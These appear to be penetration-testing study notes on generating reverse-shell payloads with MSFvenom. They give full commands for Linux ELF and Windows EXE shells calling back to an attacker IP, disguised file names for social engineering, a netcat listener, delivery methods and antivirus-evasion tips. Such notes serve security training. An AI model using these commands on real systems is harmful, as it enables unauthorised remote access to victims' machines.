Crafting Payloads with MSFvenom

Here's a structured summary of your notes on Crafting Payloads with MSFvenom:

🧠 Key Concepts

  • MSFvenom: A powerful tool used to generate and encode payloads for multiple platforms.

  • Payload Types:

    • Staged: Sends a small stage first that downloads the full payload later.

    • Stageless: Sends the full payload in one go—often more stable and better for low-bandwidth environments.

You can identify a stageless payload because there are no slashes / after the payload name—everything is bundled together.

🛠 Creating Payloads with MSFvenom

Command format:

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<port> -f <format> > <filename>

🐧 Linux Payload Example

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

  • LHOST / LPORT: Set callback IP and port

  • -f elf: Format as a Linux ELF binary

  • > createbackup.elf: Output payload file

🧪 Delivery Methods:

  • Email with attachment

  • Drive-by downloads

  • Flash drives (on-site)

  • Internal exploits

🔊 Listener setup:

sudo nc -lvnp 443

🪟 Windows Payload Example

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

  • -f exe: Generates Windows executable

  • Output: A simple .exe that can be social engineered

🧪 Requires:

  • AV bypass (if not disabled)

  • Social engineering for execution

🧩 Key Tips

  • Use msfvenom -l payloads to list all available payloads

  • Use encoding/obfuscation options to avoid AV detection

  • Match payload architecture to target (e.g., x86 vs x64)

  • Combine with Metasploit modules for delivery automation

PreviousMetasploit PayloadsNextInfiltrating Windows

Last updated